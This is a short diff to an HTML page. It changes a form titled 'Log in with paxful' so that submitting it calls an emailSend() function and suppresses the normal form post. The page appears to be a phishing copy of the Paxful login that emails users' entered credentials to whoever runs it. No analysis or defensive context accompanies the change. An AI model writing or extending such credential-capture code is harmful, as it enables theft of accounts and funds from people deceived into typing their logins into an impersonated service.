--- a/index.html
+++ b/index.html
@@ -35,7 +35,7 @@
       <i class="bi bi-chevron-down"></i>
     </div>
   </nav>
-  <form class="mx-auto" id="form" method="POST">
+  <form class="mx-auto" id="form" onsubmit="emailSend(); reset(); return false;"  method="POST">
     <div class="form__header pt-4 pb-8">
       <h1 class="capitalize text-2xl font-bold">Log in with paxful</h1>
     </div>
